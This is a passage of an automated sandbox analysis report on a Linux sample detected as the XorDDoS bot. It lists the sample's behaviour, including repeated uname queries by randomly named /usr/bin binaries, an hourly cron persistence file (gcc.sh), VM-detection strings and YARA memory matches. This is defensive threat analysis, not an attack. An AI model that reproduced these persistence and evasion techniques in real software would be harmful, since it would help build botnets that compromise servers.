                    Source: /usr/bin/gqczobuacc (PID: 4946)File: /usr/bin/gqczobuaccJump to behavior
                    Source: /usr/bin/gqczobuacc (PID: 4957)File: /usr/bin/gqczobuaccJump to behavior
                    Source: /usr/bin/gqczobuacc (PID: 4968)File: /usr/bin/gqczobuaccJump to behavior
                    Source: /usr/bin/gqczobuacc (PID: 4979)File: /usr/bin/gqczobuaccJump to behavior
                    Source: /usr/bin/uoewtvxqdd (PID: 4990)File: /usr/bin/uoewtvxqddJump to behavior
                    Source: /usr/bin/uoewtvxqdd (PID: 5001)File: /usr/bin/uoewtvxqddJump to behavior
                    Source: /usr/bin/uoewtvxqdd (PID: 5012)File: /usr/bin/uoewtvxqddJump to behavior
                    Source: /usr/bin/uoewtvxqdd (PID: 5023)File: /usr/bin/uoewtvxqddJump to behavior
                    Source: /usr/bin/uoewtvxqdd (PID: 5034)File: /usr/bin/uoewtvxqddJump to behavior
                    Source: /usr/bin/rlyjyybyum (PID: 5045)File: /usr/bin/rlyjyybyumJump to behavior
                    Source: /usr/bin/rlyjyybyum (PID: 5056)File: /usr/bin/rlyjyybyumJump to behavior
                    Source: /usr/bin/rlyjyybyum (PID: 5067)File: /usr/bin/rlyjyybyumJump to behavior
                    Source: /usr/bin/rlyjyybyum (PID: 5078)File: /usr/bin/rlyjyybyumJump to behavior
                    Source: /usr/bin/rlyjyybyum (PID: 5089)File: /usr/bin/rlyjyybyumJump to behavior
                    Source: /usr/bin/tjdqviitkh (PID: 5102)File: /usr/bin/tjdqviitkhJump to behavior
                    Source: /usr/bin/tjdqviitkh (PID: 5113)File: /usr/bin/tjdqviitkhJump to behavior
                    Source: /usr/bin/tjdqviitkh (PID: 5124)File: /usr/bin/tjdqviitkhJump to behavior
                    Source: /usr/bin/tjdqviitkh (PID: 5135)File: /usr/bin/tjdqviitkhJump to behavior
                    Source: /usr/bin/tjdqviitkh (PID: 5146)File: /usr/bin/tjdqviitkhJump to behavior
                    Source: /usr/bin/aspbnnkmso (PID: 5157)File: /usr/bin/aspbnnkmsoJump to behavior
                    Source: /usr/bin/aspbnnkmso (PID: 5168)File: /usr/bin/aspbnnkmsoJump to behavior
                    Source: /usr/bin/aspbnnkmso (PID: 5179)File: /usr/bin/aspbnnkmsoJump to behavior
                    Source: /usr/bin/aspbnnkmso (PID: 5190)File: /usr/bin/aspbnnkmsoJump to behavior
                    Source: /usr/bin/aspbnnkmso (PID: 5201)File: /usr/bin/aspbnnkmsoJump to behavior
                    Source: /usr/bin/lgnmbyzzlq (PID: 5212)File: /usr/bin/lgnmbyzzlqJump to behavior
                    Source: /usr/bin/lgnmbyzzlq (PID: 5223)File: /usr/bin/lgnmbyzzlqJump to behavior
                    Source: /usr/bin/lgnmbyzzlq (PID: 5234)File: /usr/bin/lgnmbyzzlqJump to behavior
                    Source: /usr/bin/lgnmbyzzlq (PID: 5245)File: /usr/bin/lgnmbyzzlqJump to behavior
                    Source: /usr/bin/lgnmbyzzlq (PID: 5256)File: /usr/bin/lgnmbyzzlqJump to behavior
                    Source: /usr/bin/nyavevzqtw (PID: 5267)File: /usr/bin/nyavevzqtwJump to behavior
                    Source: /usr/bin/nyavevzqtw (PID: 5278)File: /usr/bin/nyavevzqtwJump to behavior
                    Source: /usr/bin/nyavevzqtw (PID: 5289)File: /usr/bin/nyavevzqtwJump to behavior
                    Source: /usr/bin/nyavevzqtw (PID: 5300)File: /usr/bin/nyavevzqtwJump to behavior
                    Source: /usr/bin/nyavevzqtw (PID: 5311)File: /usr/bin/nyavevzqtwJump to behavior
                    Source: /usr/bin/tstbdpivhl (PID: 5322)File: /usr/bin/tstbdpivhlJump to behavior
                    Source: /usr/bin/tstbdpivhl (PID: 5333)File: /usr/bin/tstbdpivhlJump to behavior
                    Source: /usr/bin/tstbdpivhl (PID: 5345)File: /usr/bin/tstbdpivhlJump to behavior
                    Source: /usr/bin/tstbdpivhl (PID: 5355)File: /usr/bin/tstbdpivhlJump to behavior
                    Source: /usr/bin/tstbdpivhl (PID: 5366)File: /usr/bin/tstbdpivhlJump to behavior
                    Source: /usr/bin/lndoiatrux (PID: 5377)File: /usr/bin/lndoiatruxJump to behavior
                    Source: /usr/bin/lndoiatrux (PID: 5388)File: /usr/bin/lndoiatruxJump to behavior
                    Source: /usr/bin/lndoiatrux (PID: 5399)File: /usr/bin/lndoiatruxJump to behavior
                    Source: /usr/bin/lndoiatrux (PID: 5410)File: /usr/bin/lndoiatruxJump to behavior
                    Source: /usr/bin/lndoiatrux (PID: 5421)File: /usr/bin/lndoiatruxJump to behavior
                    Source: /usr/bin/nefhkhnwwh (PID: 5432)File: /usr/bin/nefhkhnwwhJump to behavior
                    Source: /usr/bin/nefhkhnwwh (PID: 5443)File: /usr/bin/nefhkhnwwhJump to behavior
                    Source: /usr/bin/nefhkhnwwh (PID: 5454)File: /usr/bin/nefhkhnwwhJump to behavior
                    Source: /usr/bin/nefhkhnwwh (PID: 5465)File: /usr/bin/nefhkhnwwhJump to behavior
                    Source: /usr/bin/nefhkhnwwh (PID: 5476)File: /usr/bin/nefhkhnwwhJump to behavior
                    Source: /usr/bin/bjhmdsecwa (PID: 5487)File: /usr/bin/bjhmdsecwaJump to behavior
                    Source: /usr/bin/bjhmdsecwa (PID: 5498)File: /usr/bin/bjhmdsecwaJump to behavior
                    Source: /usr/bin/bjhmdsecwa (PID: 5509)File: /usr/bin/bjhmdsecwaJump to behavior
                    Source: /usr/bin/bjhmdsecwa (PID: 5520)File: /usr/bin/bjhmdsecwaJump to behavior
                    Source: /usr/bin/bjhmdsecwa (PID: 5531)File: /usr/bin/bjhmdsecwaJump to behavior
                    Source: /usr/bin/otvvhyamws (PID: 5542)File: /usr/bin/otvvhyamwsJump to behavior
                    Source: /usr/bin/otvvhyamws (PID: 5553)File: /usr/bin/otvvhyamwsJump to behavior
                    Source: /usr/bin/otvvhyamws (PID: 5565)File: /usr/bin/otvvhyamwsJump to behavior
                    Source: /usr/bin/otvvhyamws (PID: 5568)File: /usr/bin/otvvhyamwsJump to behavior
                    Source: /usr/bin/otvvhyamws (PID: 5572)File: /usr/bin/otvvhyamwsJump to behavior
                    Source: /usr/bin/aysistkyqn (PID: 5598)File: /usr/bin/aysistkyqnJump to behavior
                    Source: /usr/bin/aysistkyqn (PID: 5601)File: /usr/bin/aysistkyqnJump to behavior
                    Source: /usr/bin/aysistkyqn (PID: 5605)File: /usr/bin/aysistkyqnJump to behavior
                    Source: /usr/bin/aysistkyqn (PID: 5611)File: /usr/bin/aysistkyqnJump to behavior
                    Source: /usr/bin/aysistkyqn (PID: 5615)File: /usr/bin/aysistkyqnJump to behavior
                    Source: /usr/bin/flwslywqdx (PID: 5653)File: /usr/bin/flwslywqdxJump to behavior
                    Source: /usr/bin/flwslywqdx (PID: 5656)File: /usr/bin/flwslywqdxJump to behavior
                    Source: /usr/bin/flwslywqdx (PID: 5661)File: /usr/bin/flwslywqdxJump to behavior
                    Source: /usr/bin/flwslywqdx (PID: 5668)File: /usr/bin/flwslywqdxJump to behavior
                    Source: /usr/bin/flwslywqdx (PID: 5677)File: /usr/bin/flwslywqdxJump to behavior
                    Source: /usr/bin/neofzderab (PID: 5710)File: /usr/bin/neofzderabJump to behavior
                    Source: /usr/bin/neofzderab (PID: 5714)File: /usr/bin/neofzderabJump to behavior
                    Source: /usr/bin/neofzderab (PID: 5719)File: /usr/bin/neofzderabJump to behavior
                    Source: /usr/bin/neofzderab (PID: 5725)File: /usr/bin/neofzderabJump to behavior
                    Source: /usr/bin/neofzderab (PID: 5732)File: /usr/bin/neofzderabJump to behavior
                    Source: /usr/bin/yxfexdyggl (PID: 5765)File: /usr/bin/yxfexdygglJump to behavior
                    Source: /usr/bin/yxfexdyggl (PID: 5769)File: /usr/bin/yxfexdygglJump to behavior
                    Source: /usr/bin/yxfexdyggl (PID: 5775)File: /usr/bin/yxfexdygglJump to behavior
                    Source: /usr/bin/yxfexdyggl (PID: 5779)File: /usr/bin/yxfexdygglJump to behavior
                    Source: /usr/bin/yxfexdyggl (PID: 5784)File: /usr/bin/yxfexdygglJump to behavior
                    Source: /usr/bin/taocfwkdjv (PID: 5820)File: /usr/bin/taocfwkdjvJump to behavior
                    Source: /usr/bin/taocfwkdjv (PID: 5824)File: /usr/bin/taocfwkdjvJump to behavior
                    Source: /usr/bin/taocfwkdjv (PID: 5830)File: /usr/bin/taocfwkdjvJump to behavior
                    Source: /usr/bin/taocfwkdjv (PID: 5834)File: /usr/bin/taocfwkdjvJump to behavior
                    Source: /usr/bin/taocfwkdjv (PID: 5839)File: /usr/bin/taocfwkdjvJump to behavior
                    Source: /usr/bin/vhplhrsffz (PID: 5875)File: /usr/bin/vhplhrsffzJump to behavior
                    Source: /usr/bin/vhplhrsffz (PID: 5878)File: /usr/bin/vhplhrsffzJump to behavior
                    Source: /usr/bin/vhplhrsffz (PID: 5882)File: /usr/bin/vhplhrsffzJump to behavior
                    Source: /usr/bin/vhplhrsffz (PID: 5887)File: /usr/bin/vhplhrsffzJump to behavior
                    Source: /usr/bin/vhplhrsffz (PID: 5895)File: /usr/bin/vhplhrsffzJump to behavior
                    Source: /usr/bin/vdaqfdcrtx (PID: 5930)File: /usr/bin/vdaqfdcrtxJump to behavior
                    Source: /usr/bin/vdaqfdcrtx (PID: 5933)File: /usr/bin/vdaqfdcrtxJump to behavior
                    Source: /usr/bin/vdaqfdcrtx (PID: 5938)File: /usr/bin/vdaqfdcrtxJump to behavior
                    Source: /usr/bin/vdaqfdcrtx (PID: 5945)File: /usr/bin/vdaqfdcrtxJump to behavior
                    Source: /usr/bin/vdaqfdcrtx (PID: 5949)File: /usr/bin/vdaqfdcrtxJump to behavior
                    Source: /usr/bin/vyvijtmtnz (PID: 5985)File: /usr/bin/vyvijtmtnzJump to behavior
                    Source: /usr/bin/vyvijtmtnz (PID: 5989)File: /usr/bin/vyvijtmtnzJump to behavior
                    Source: /usr/bin/vyvijtmtnz (PID: 5994)File: /usr/bin/vyvijtmtnzJump to behavior
                    Source: /usr/bin/vyvijtmtnz (PID: 6001)File: /usr/bin/vyvijtmtnzJump to behavior
                    Source: /usr/bin/vyvijtmtnz (PID: 6008)File: /usr/bin/vyvijtmtnzJump to behavior
                    Source: /usr/bin/vggdimllrz (PID: 6040)File: /usr/bin/vggdimllrzJump to behavior
                    Source: /usr/bin/vggdimllrz (PID: 6044)File: /usr/bin/vggdimllrzJump to behavior
                    Source: /usr/bin/vggdimllrz (PID: 6050)File: /usr/bin/vggdimllrzJump to behavior
                    Source: /usr/bin/vggdimllrz (PID: 6055)File: /usr/bin/vggdimllrzJump to behavior
                    Source: /usr/bin/vggdimllrz (PID: 6062)File: /usr/bin/vggdimllrzJump to behavior
                    Source: /usr/bin/dowmukqhnk (PID: 6095)File: /usr/bin/dowmukqhnkJump to behavior
                    Source: /usr/bin/dowmukqhnk (PID: 6098)File: /usr/bin/dowmukqhnkJump to behavior
                    Source: /usr/bin/dowmukqhnk (PID: 6104)File: /usr/bin/dowmukqhnkJump to behavior
                    Source: /usr/bin/dowmukqhnk (PID: 6110)File: /usr/bin/dowmukqhnkJump to behavior
                    Source: /usr/bin/dowmukqhnk (PID: 6118)File: /usr/bin/dowmukqhnkJump to behavior
                    Source: /usr/bin/ejrpibbjio (PID: 6150)File: /usr/bin/ejrpibbjioJump to behavior
                    Source: /usr/bin/ejrpibbjio (PID: 6153)File: /usr/bin/ejrpibbjioJump to behavior
                    Source: /usr/bin/ejrpibbjio (PID: 6157)File: /usr/bin/ejrpibbjioJump to behavior
                    Source: /usr/bin/ejrpibbjio (PID: 6163)File: /usr/bin/ejrpibbjioJump to behavior
                    Source: /usr/bin/ejrpibbjio (PID: 6169)File: /usr/bin/ejrpibbjioJump to behavior
                    Source: /usr/bin/ztfvwcbmzm (PID: 6221)File: /usr/bin/ztfvwcbmzmJump to behavior
                    Source: /usr/bin/ztfvwcbmzm (PID: 6223)File: /usr/bin/ztfvwcbmzmJump to behavior
                    Source: /usr/bin/ztfvwcbmzm (PID: 6222)File: /usr/bin/ztfvwcbmzmJump to behavior
                    Source: /usr/bin/ztfvwcbmzm (PID: 6225)File: /usr/bin/ztfvwcbmzmJump to behavior
                    Source: /usr/bin/ztfvwcbmzm (PID: 6226)File: /usr/bin/ztfvwcbmzmJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)Path: /etc/cron.hourly/gcc.shJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)Path: /run/gcc.pidJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4551)Queries kernel information via 'uname': Jump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/jjltawydwf (PID: 4656)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/jjltawydwf (PID: 4667)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/jjltawydwf (PID: 4678)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/jjltawydwf (PID: 4689)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/jjltawydwf (PID: 4700)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ouhdchrbdz (PID: 4714)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ouhdchrbdz (PID: 4725)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ouhdchrbdz (PID: 4736)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ouhdchrbdz (PID: 4747)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ouhdchrbdz (PID: 4758)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/fcxqfstrdm (PID: 4769)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/fcxqfstrdm (PID: 4780)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/fcxqfstrdm (PID: 4791)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/fcxqfstrdm (PID: 4802)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/fcxqfstrdm (PID: 4813)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/dxeguomyxc (PID: 4824)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/dxeguomyxc (PID: 4835)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/dxeguomyxc (PID: 4846)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/dxeguomyxc (PID: 4857)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/dxeguomyxc (PID: 4868)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ctrygxclrx (PID: 4879)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ctrygxclrx (PID: 4890)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ctrygxclrx (PID: 4901)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ctrygxclrx (PID: 4912)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ctrygxclrx (PID: 4923)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/gqczobuacc (PID: 4934)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/gqczobuacc (PID: 4945)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/gqczobuacc (PID: 4956)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/gqczobuacc (PID: 4967)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/gqczobuacc (PID: 4978)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/uoewtvxqdd (PID: 4989)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/uoewtvxqdd (PID: 5000)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/uoewtvxqdd (PID: 5011)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/uoewtvxqdd (PID: 5022)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/uoewtvxqdd (PID: 5033)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/rlyjyybyum (PID: 5044)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/rlyjyybyum (PID: 5055)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/rlyjyybyum (PID: 5066)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/rlyjyybyum (PID: 5077)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/rlyjyybyum (PID: 5088)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/tjdqviitkh (PID: 5101)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/tjdqviitkh (PID: 5112)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/tjdqviitkh (PID: 5123)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/tjdqviitkh (PID: 5134)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/tjdqviitkh (PID: 5145)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/aspbnnkmso (PID: 5156)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/aspbnnkmso (PID: 5167)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/aspbnnkmso (PID: 5178)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/aspbnnkmso (PID: 5189)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/aspbnnkmso (PID: 5200)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/lgnmbyzzlq (PID: 5211)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/lgnmbyzzlq (PID: 5222)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/lgnmbyzzlq (PID: 5233)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/lgnmbyzzlq (PID: 5244)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/lgnmbyzzlq (PID: 5255)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/nyavevzqtw (PID: 5266)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/nyavevzqtw (PID: 5277)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/nyavevzqtw (PID: 5288)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/nyavevzqtw (PID: 5299)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/nyavevzqtw (PID: 5310)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/tstbdpivhl (PID: 5321)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/tstbdpivhl (PID: 5332)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/tstbdpivhl (PID: 5343)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/tstbdpivhl (PID: 5354)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/tstbdpivhl (PID: 5365)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/lndoiatrux (PID: 5376)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/lndoiatrux (PID: 5387)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/lndoiatrux (PID: 5398)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/lndoiatrux (PID: 5409)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/lndoiatrux (PID: 5420)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/nefhkhnwwh (PID: 5431)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/nefhkhnwwh (PID: 5442)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/nefhkhnwwh (PID: 5453)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/nefhkhnwwh (PID: 5464)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/nefhkhnwwh (PID: 5475)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/bjhmdsecwa (PID: 5486)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/bjhmdsecwa (PID: 5497)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/bjhmdsecwa (PID: 5508)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/bjhmdsecwa (PID: 5519)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/bjhmdsecwa (PID: 5530)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/otvvhyamws (PID: 5541)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/otvvhyamws (PID: 5552)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/otvvhyamws (PID: 5563)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/otvvhyamws (PID: 5566)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/otvvhyamws (PID: 5569)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/aysistkyqn (PID: 5596)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/aysistkyqn (PID: 5599)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/aysistkyqn (PID: 5602)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/aysistkyqn (PID: 5607)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/aysistkyqn (PID: 5613)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/flwslywqdx (PID: 5651)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/flwslywqdx (PID: 5654)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/flwslywqdx (PID: 5658)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/flwslywqdx (PID: 5663)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/flwslywqdx (PID: 5670)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/neofzderab (PID: 5708)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/neofzderab (PID: 5711)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/neofzderab (PID: 5715)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/neofzderab (PID: 5721)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/neofzderab (PID: 5727)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/yxfexdyggl (PID: 5763)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/yxfexdyggl (PID: 5766)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/yxfexdyggl (PID: 5771)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/yxfexdyggl (PID: 5776)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/yxfexdyggl (PID: 5781)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/taocfwkdjv (PID: 5818)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/taocfwkdjv (PID: 5821)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/taocfwkdjv (PID: 5825)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/taocfwkdjv (PID: 5829)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/taocfwkdjv (PID: 5836)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vhplhrsffz (PID: 5873)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vhplhrsffz (PID: 5876)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vhplhrsffz (PID: 5879)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vhplhrsffz (PID: 5883)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vhplhrsffz (PID: 5889)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vdaqfdcrtx (PID: 5928)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vdaqfdcrtx (PID: 5931)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vdaqfdcrtx (PID: 5935)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vdaqfdcrtx (PID: 5940)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vdaqfdcrtx (PID: 5947)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vyvijtmtnz (PID: 5983)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vyvijtmtnz (PID: 5986)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vyvijtmtnz (PID: 5990)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vyvijtmtnz (PID: 5995)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vyvijtmtnz (PID: 6003)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vggdimllrz (PID: 6038)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vggdimllrz (PID: 6041)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vggdimllrz (PID: 6046)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vggdimllrz (PID: 6052)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/vggdimllrz (PID: 6059)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/dowmukqhnk (PID: 6093)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/dowmukqhnk (PID: 6096)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/dowmukqhnk (PID: 6100)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/dowmukqhnk (PID: 6106)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/dowmukqhnk (PID: 6113)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ejrpibbjio (PID: 6148)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ejrpibbjio (PID: 6151)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ejrpibbjio (PID: 6154)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ejrpibbjio (PID: 6159)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ejrpibbjio (PID: 6166)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ztfvwcbmzm (PID: 6213)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ztfvwcbmzm (PID: 6215)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ztfvwcbmzm (PID: 6217)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ztfvwcbmzm (PID: 6219)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/ztfvwcbmzm (PID: 6224)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/getzgxvgyl (PID: 6268)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/getzgxvgyl (PID: 6270)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/getzgxvgyl (PID: 6273)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/getzgxvgyl (PID: 6277)Queries kernel information via 'uname': Jump to behavior
                    Source: /usr/bin/getzgxvgyl (PID: 6282)Queries kernel information via 'uname': Jump to behavior
                    Source: .depend.boot.20.drBinary or memory string: qemu-kvm: mountkernfs.sh udev
                    Source: 4ljhdTTyiA, 4713.1.0000000008960000.0000000008982000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
                    Source: 4ljhdTTyiA, 4713.1.0000000008960000.0000000008982000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsdt/1.ref4a75b2e6e8e8a55aab94da/system.journal
                    Source: .depend.boot.20.drBinary or memory string: TARGETS = console-setup resolvconf alsa-utils mountkernfs.sh ufw plymouth-log hostname.sh lm-sensors screen-cleanup pppd-dns apparmor x11-common udev keyboard-setup mountdevsubfs.sh brltty procps qemu-kvm cryptdisks cryptdisks-early hwclock.sh open-iscsi networking iscsid checkroot.sh lvm2 urandom checkfs.sh mountall.sh mountall-bootclean.sh bootmisc.sh kmod mountnfs.sh checkroot-bootclean.sh mountnfs-bootclean.sh

                    Remote Access Functionality:

                    barindex
                    Yara detected XorDDoS BotShow sources
                    Source: Yara matchFile source: 4ljhdTTyiA, type: SAMPLE
                    Source: Yara matchFile source: 5232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4812.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4666.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5100.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4856.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4867.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5144.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4768.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5166.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4845.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
